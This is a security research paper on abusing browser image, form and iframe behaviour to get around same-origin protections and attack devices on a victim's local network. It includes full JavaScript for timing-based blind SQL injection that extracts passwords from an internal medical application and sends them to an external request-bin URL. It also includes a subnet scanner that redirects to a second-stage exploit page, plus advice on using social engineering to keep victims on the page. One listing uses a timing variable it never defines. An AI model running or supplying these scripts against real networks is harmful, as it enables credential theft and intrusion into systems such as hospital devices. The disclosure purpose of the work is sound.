Bypassing origin policies to exploit local network devices

Introduction

This research paper introduces new, currently working techniques for bypassing the SOP and CORS mechanisms in current browsers. These techniques can be used to exploit local devices in remote networks without being directly connected to those devices. The devices do not have to be connected to the internet. The techniques were developed by Jean Pereira from CYTRES during a penetration test targeting a German hospital.

Attack surface

The attacks explained in this paper take advantage of weak SOP/CORS mechanisms in current browsers and use a victim’s browser as an attack client to exploit local network devices. But first of all, why are these mechanisms weak in the first place? Let’s have a look at the attack surface, and at why these attacks are so hard to defeat on the browser side.

Images

Image elements offer a wide range of features that are dangerous from a security perspective: they load remote URIs, support URIs with different protocols and HTTP versions, and fire a callback when the resource has loaded. There is also a fallback (error) handler that is called when an invalid resource is loaded, which is highly dangerous in terms of security. All of these features are used in the attacks documented in this paper.

It’s difficult to harden this component because all of these features serve a legitimate and relevant purpose in modern web browsers. Disallowing the loading of images from remote URIs in general would break a huge part of the modern web, so this is not an option. The full responsibility for building secure web applications therefore rests with the developer.

Another dangerous feature is the ability to request any kind of resource using an image element without being stopped by the same-origin policy. The page cannot read the response body, but the request is still sent, so requesting data via an image tag works in most scenarios where XHR or other native requests are blocked by the SOP or by CORS.

The reason for this is that the image element does not send a “preflight request”, an additional HTTP OPTIONS request that XHR or fetch send before cross-origin requests that are not considered “simple” (for example, requests with custom headers). Because the OPTIONS request is skipped, the attacker can request any resource from an arbitrary domain.

In addition, an image element does not perform any MIME type checking, which means that the resource does not even have to be an image.
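As a minimal sketch of the callbacks described above, the following helper reports which event fired for an image request and how long the request took to settle. The name `timeImageRequest` and the `createImage` parameter are assumptions introduced here for illustration; they are not part of the original research. The parameter only exists so the helper can be exercised outside a browser.

```javascript
// Hypothetical helper (not from the original paper): observe when an image
// request settles and how long it took. createImage is an assumed injection
// point; in a browser it defaults to the built-in Image constructor.
function timeImageRequest(url, onSettled, createImage = () => new Image()) {
  const startTime = performance.now();
  const image = createImage();

  // Both events report the same shape; only the outcome label differs.
  const settle = (outcome) => () =>
    onSettled({ outcome, elapsedMs: performance.now() - startTime });

  image.onload = settle("load");   // the response decoded as an image
  image.onerror = settle("error"); // the response was not an image, or the host was unreachable
  image.src = url;                 // assigning src starts the request
  return image;
}
```

The page never sees the response body here. It only learns the outcome and the elapsed time, which is exactly the information the later sections rely on.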

This has been widely abused in XSS attacks in the past, for example to hijack the victim’s cookie by sending it to an external HTTP service via an image element.

In this paper we will go a step further and combine the capabilities of the image element and its callbacks with other dangerous functions, such as load-time measurement, to exploit blind injection vulnerabilities.

Forms

Forms are a powerful tool for attackers because they allow sending POST requests to remote domains outside the scope of the current domain. This gives an attacker not only advanced logging capabilities, but also the option to automatically exploit CSRF vulnerabilities by using self-submitting forms, which are simply pre-filled forms combined with a JavaScript one-liner that submits the form.

The attacker can use an inline frame as target for the form so the attack remains hidden. If the application lacks a CSRF token, the attacker can preset any configuration value (e.g. passwords) using forms.

XSS vulnerabilities can also easily be exploited and masked using forms. The basic issue with forms is that you want to allow them to submit data to remote URIs by default, because that is a very widespread use case. Blocking this feature by default in the browser would also break a huge part of the web.

While it is not possible to measure the loading time from the form submission itself, we will have a look at a little trick that can be used to still measure the loading time of the form target.

Inline frames

Inline frames are widely used to embed remote components and websites inside of a web application. That’s why it’s not really an option to block all remote frame requests by default. There were some security features introduced in the past, like the X-Frame-Options header, the CORP configuration and default security attributes for inline frames, but specifically those security attributes can be used for advanced attacks (e.g. to embed a component but prevent it from redirecting).

The ability to point to any custom resource, no matter which protocol, port or host is used, can be used to fingerprint and discover local services on the victim’s device. We will also build a custom device scanner that scans whole subnets in a few seconds.

In the following attack scenarios we will combine the power of inline frames (which also provide a callback when the resource is loaded) with the other elements mentioned above to build strong and reliable exploit chains.

Exploitation

Time-based exploitation

In the first example we use an image and the browser’s performance API to exploit a blind SQL injection. This example has been used in a medical environment to attack the target and has been verified in current Safari and Chrome browsers.

First, we use the performance API to record a start time. We then create a new image element and assign the fallback (error) handler, which fires when the resource is “not loaded”. In our scenario this actually means the resource has been loaded, because the handler is only called once the response has been fully received and then rejected as an “invalid image”.

The image element is created dynamically by the function and then points to the target application with the injected payload. The payload contains a time-based attack pattern which freezes the application for a few seconds if the character code at a specific position matches the character code we searched for.

We test all character codes between 32 and 126 for every single character in the password. If the character code matches, we proceed to check the next character. If the candidate code runs past the end of the range 32-126 without a match, we have extracted all characters of the password, as there is no further character.
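The enumeration described above can be read as a small state machine. The following is a sketch under stated assumptions: `nextState`, `FIRST_CODE`, `LAST_CODE` and the shape of the state object are names introduced here for illustration and do not appear in the original listings, which keep the same information in the query string instead.

```javascript
// Printable ASCII range taken from the text above.
const FIRST_CODE = 32;
const LAST_CODE = 126;

// Hypothetical pure function: given the current position (index), the
// candidate character code (code) and the codes found so far (chars),
// return the next state depending on whether the candidate matched.
function nextState(state, matched) {
  if (matched) {
    // Keep the confirmed code and restart the range at the next position.
    return {
      index: state.index + 1,
      code: FIRST_CODE,
      chars: [...state.chars, state.code],
      done: false,
    };
  }
  if (state.code >= LAST_CODE) {
    // Every candidate was rejected: there is no character at this position.
    return { ...state, done: true };
  }
  // Try the next candidate at the same position.
  return { ...state, code: state.code + 1 };
}
```

Keeping the transition free of side effects makes the termination condition easy to check: the loop ends exactly when the whole range has been rejected at one position.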

As mentioned before, the image element offers a fallback event handler, which is called when the resource loaded by the image element is invalid or not reachable. That means an attacker can abuse this fallback handler to request a custom resource and still get a callback after the resource is loaded.

The reason for this is that the fallback event handler is only called after the loading of the resource is finished. Instead of rejecting the response early based on its MIME header, the browser waits until the resource has been fully fetched or cannot be reached, and only then calls the fallback event handler.

Once the resource has been loaded and the fallback handler is called, the current time is compared to the start time which was recorded before. In the listing below, the character is treated as a match if the difference is one second or more (the check tests whether the integer part of the millisecond value has more than three digits). In that case the function takes this as confirmation that the injected delay was executed and jumps to the next character.
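The comparison in the listing that follows is written as a digit count on the formatted millisecond value. As a small sketch, this is how that check behaves next to an explicit numeric comparison. `isDelayedByDigits`, `isDelayed` and `thresholdMs` are names introduced here for illustration only.

```javascript
// The check as written in the listing: true when the integer part of the
// millisecond value (after rounding to two decimals) has four or more digits.
function isDelayedByDigits(loadingTime) {
  return loadingTime.toFixed(2).split(".")[0].length > 3;
}

// Assumed clearer alternative with an explicit, configurable threshold.
function isDelayed(loadingTime, thresholdMs = 1000) {
  return loadingTime >= thresholdMs;
}
```

Apart from rounding right at the boundary, both functions agree for non-negative values: anything from one second upward counts as a delayed response. The explicit form makes it easier to pick a threshold that sits clearly above normal network jitter.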

function crossOriginRequest() {
  const startTime = performance.now();
  const image = new Image();

  image.onerror = function () {
    const endTime = performance.now();
    const loadingTime = endTime - startTime;

    if (loadingTime.toFixed(2).split(".")[0].length > 3) {
      chars.push(targetPos);
      window.location.href = window.location.href.split("?")[0] + `?target=32&index=${index+1}&chars=${JSON.stringify(chars)}`
    } else {
      window.location.href = window.location.href.split("?")[0] + `?target=${(parseInt(targetPos)+1)}&index=${index}&chars=${JSON.stringify(chars)}`
    }
  }

  const sleep = "(LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2)))))";
  const payload = `UNION SELECT 1,2,3,(CASE WHEN (SUBSTR(COALESCE(${column},CHAR(32)),${index},1)==CHAR(${targetPos})) THEN ${sleep} ELSE 1 END) FROM ${table}`;

  image.src = `${targetHost}-99%20${payload}%20--%20a`;
  setTimeout("window.location.reload()", 2000) // prevent browser-based request blocking
}

The character enumeration is done by storing the current character code and the current character index in the query string of the URI. In addition, an array of the character codes which have already been extracted is stored in the URI. This array represents the final password or database value which is extracted.

If the timing attack is executed successfully, the page redirects to the next character position by increasing the index value and adding the current character to the “chars” array. This runs in a loop until the last character of the password is reached.

Finally, we prevent the browser from hanging by adding an automatic reload after two seconds (this happens rarely, but it happens).

The same-origin policy would usually block any attempt to measure the loading time of an external web application, but by using the fallback handler of the image element and then measuring the loading time within our own web application, this can be bypassed.

This scenario uses the victim’s browser as an exploit client to execute the malicious queries on the local system.

In the next step we define a public request bin URI to store the password (again using an image element to send a GET request to the request bin). In general this specific request could also be done by XHR since there is a server to server communication, but in case the payload is injected and an unknown CORP is at play, we use an image tag for this communication as well. In addition, we define our target application and start to crack the password at index position one.
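To make the state handling concrete, here is a minimal sketch of reading and writing the three values with `URLSearchParams` instead of manual string splitting. The helper names `serializeState`, `parseState` and `charsToString` are assumptions introduced for illustration; the parameter names `target`, `index` and `chars` are the ones used in the listings.

```javascript
// Hypothetical helpers (not from the original paper) for the query-string state.

// Build a query string; URLSearchParams percent-encodes the JSON array.
function serializeState({ target, index, chars }) {
  const params = new URLSearchParams({
    target: String(target),
    index: String(index),
    chars: JSON.stringify(chars),
  });
  return `?${params.toString()}`;
}

// Read the state back; returns null on the first visit, when no state exists.
function parseState(search) {
  const params = new URLSearchParams(search);
  if (!params.has("target")) return null;
  return {
    target: parseInt(params.get("target"), 10),
    index: parseInt(params.get("index"), 10),
    chars: JSON.parse(params.get("chars") || "[]"),
  };
}

// Turn the collected character codes into the extracted string.
function charsToString(chars) {
  return String.fromCharCode(...chars);
}
```

Parsing by parameter name does not depend on the order of the parameters, and the explicit encoding avoids problems with brackets and commas in the serialized array.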

var index;
var chars;
var targetPos;

const targetHost = "http://10.100.50.3/medpal/";

const table = "users";
const column = "password";

const requestBin = "https://eomfmwlo9vqan97.m.pipedream.net";

var div = document.createElement("div");
div.innerHTML = "Loading attack...";
document.body.appendChild(div);

if (window.location.search.split("=")[1] == undefined) {

  setTimeout('window.location.href = window.location.href.split("?")[0] + "?target=32&index=1&chars=[]"', 1000)

} else {

  chars = JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1]));
  targetPos = window.location.search.split("target=")[1].split("&")[0];
  index = parseInt(window.location.search.split("index=")[1].split("&")[0]);

  div.innerHTML = `Cracking... [i=${index}, p=${targetPos}, c="${String.fromCharCode(targetPos)}"]`;

  if (targetPos < 126) {
    crossOriginRequest();
  } else {
    const password = String.fromCharCode.apply(null, JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1])));
    document.createElement("img").src = `${requestBin}?password=${password}`;
    requestAnimationFrame(() => {
      div.innerHTML = `Cracked password is: <span>${password}</span>`;
    })
  }
}

Using forms for a time-based exploitation of POST requests

The trick is that we submit a form to an existing inline frame and then receive a callback from the inline frame when the request is loaded. By accessing this callback, we can then once again measure the elapsed loading time of our current website and check if our payload has been successfully executed as above.

if (window.location.search.split("=")[1] == undefined) {

  // prevent premature form submission
  (function () {
    const startTime = Date.now();
    while (Date.now() - startTime < 500) {}
  })();

  setTimeout('window.location.href = window.location.href.split("?")[0] + "?target=32&index=1&chars=[]"', 1000)

} else {

  chars = JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1]));
  targetPos = window.location.search.split("target=")[1].split("&")[0];
  index = parseInt(window.location.search.split("index=")[1].split("&")[0]);

  div.innerHTML = `Cracking... [i=${index}, p=${targetPos}, c="${String.fromCharCode(targetPos)}"]`;

  if (targetPos < 126) {
    crossOriginRequest();
  } else {
    const password = String.fromCharCode.apply(null, JSON.parse(decodeURIComponent(window.location.search.split("chars=")[1])));
    document.createElement("img").src = `${requestBin}?password=${password}`;
    document.write(`Cracked password is: <span>${password}</span>`);
  }
}

var counter = 0;

function crossOriginRequest() {

  sleep = "(LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2)))))";
  payload = `UNION SELECT 1,2,3,(CASE WHEN (SUBSTR(COALESCE(${column},CHAR(32)),${index},1)==CHAR(${targetPos})) THEN ${sleep} ELSE 1 END) FROM ${table}`

  const endTime = performance.now();
  const loadingTime = endTime - startTime;

  if (counter > 0) { // avoid calling crossOriginRequest() on iframe initialization
    if (loadingTime.toFixed(2).split(".")[0].length > 3) {
      chars.push(targetPos);
      window.location.href = window.location.href.split("?")[0] + `?target=32&index=${index+1}&chars=${JSON.stringify(chars)}`
    } else {
      window.location.href = window.location.href.split("?")[0] + `?target=${(parseInt(targetPos)+1)}&index=${index}&chars=${JSON.stringify(chars)}`
    }
  }
  counter++
}
if (targetPos < 126) {
  document.write(`
      <div style="display:none">
      <iframe id="ifr" name="ifr" onload="crossOriginRequest()"></iframe>
      <form method="POST" target="ifr" action="${targetHost}-99%20${payload}%20--%20a">
      <input type="submit">
      </form>
      </div>
    `);
  document.forms[0].submit()
}

Device scanning

Device scanning is used to find the local IP address of the target device by using image tags to fingerprint the web application. I think this part in particular is something that browsers should take into account in terms of security, because you can basically run a full subnet scan in the web browser to find the local device with this fingerprinting method.

The attack abuses the victim’s browser to scan its own local network, using an arbitrary image path of the target application as the fingerprinting indicator. The script scans all IPs from 192.168.0.0 to 192.168.255.254 and runs incredibly fast, because there is only a single indicator that has to be checked. It can also be used as a port scanner if the application runs on a custom port.
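To give a sense of the size of the search space, the following sketch enumerates the candidate addresses. It mirrors the loop bounds of the listing below (0 to 255 for the last octet) and assumes the third octet also runs from 0 to 255. The generator name `candidateAddresses` and its `prefix` parameter are assumptions introduced here for illustration.

```javascript
// Hypothetical generator (not from the original paper): yields every
// candidate address under a two-octet prefix, one /24 subnet at a time.
function* candidateAddresses(prefix = "192.168") {
  for (let subnet = 0; subnet <= 255; subnet++) {
    for (let host = 0; host <= 255; host++) {
      yield `${prefix}.${subnet}.${host}`;
    }
  }
}

// 256 subnets with 256 addresses each.
const totalCandidates = [...candidateAddresses()].length;
```

With one fingerprint request per address, this comes to 65,536 requests in total, which is why the scan is split into one batch per /24 subnet.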

<html>
  <body>
    <div id="status-container"></div>
    <div id="ip-container"></div>

    <script>
      const ipSubnet = window.location.hash.slice(1);
      const servicePort = 80;
      const serviceFingerprint = "app_logo.png"; // arbitrary image path that exists in the target application

      var currentSubnet = parseInt(window.location.search.split("=")[1]);

      function checkStatus() {
        try {
          if(document.querySelector("iframe").contentDocument.body.innerHTML == "Loaded") {
            window.location.href = `${window.location.href.split("?")[0]}?subnet=${currentSubnet+1}`
          } else {
            setTimeout("checkStatus()", 100);
          }
        } catch(e) {
          setTimeout("checkStatus()", 100);
        }
      }

      function locateService() {
        for (let i = 0; i <= 255; i++) {
          const ipAddress = `192.168.${ipSubnet}.${i}`;
          const img = document.createElement("img");
          img.src = `http://${ipAddress}:${servicePort}/${serviceFingerprint}`;
          img.style.display = "none";
          img.onload = () => {
            parent.location.href = `https://cytres.com/second-stage.html`; // redirect to second exploit stager
          };
          document.getElementById("ip-container").appendChild(img);
          if(i == 255) {
            setTimeout('document.body.outerHTML = "Loaded"', 1000);
          }
        }
      }

      function loadSubnets() {
        const subnetFrame = document.createElement("iframe");
        subnetFrame.style.display = "none";
        subnetFrame.src = window.location.href + `#${currentSubnet}`;
        document.getElementById("ip-container").appendChild(subnetFrame);
        document.querySelector("#status-container").innerHTML = `Scanning: <span>192.168.${currentSubnet}.0/24</span>`;
      }

      if(isNaN(currentSubnet)) {
        document.querySelector("#status-container").style.display = "none";
        const subnetFrame = document.createElement("iframe");
        subnetFrame.src = window.location.href + `?subnet=0`;
        document.getElementById("ip-container").appendChild(subnetFrame);
      } else {
        if(ipSubnet.length > 0) {
          locateService();
        } else {
          loadSubnets();
          checkStatus();
        }
      }
    </script>
  </body>
</html>

The device scanner can run in the background. The fingerprinting requires the user to stay on the website for anywhere between a few seconds and about 20 minutes, so a smart approach is to use social engineering to keep the user engaged on the website.

This can be done by using a video (as demonstrated in the demo video on the CYTRES website) but also by using a PDF document, a form or survey, a chat or anything similar. An attacker would pick the scenario which best suits the situation.

After the device has been found, the user is redirected to the second exploit stager (second-stage.html). The attacker can pass the device IP as a query parameter or save it in local storage.

This allows an attacker to proceed with an arbitrary attack on the local device (XSS, CSRF, RCE, SQLi, RFI, LFI, etc.)

Conclusion

While modern browsers offer many methods to secure remote origin operations, there are still flaws that are dangerously useful for attackers targeting local devices. These are also very hard to fix, since there are too many legitimate use cases which are still important in modern web development.

We may expect completely new ways of dealing with cross-origin restrictions in the near future, since the current state of the art offers too much attack surface for hackers. This paper will also be submitted to all major browser companies to make sure they consider dealing with these kinds of attacks in the future.
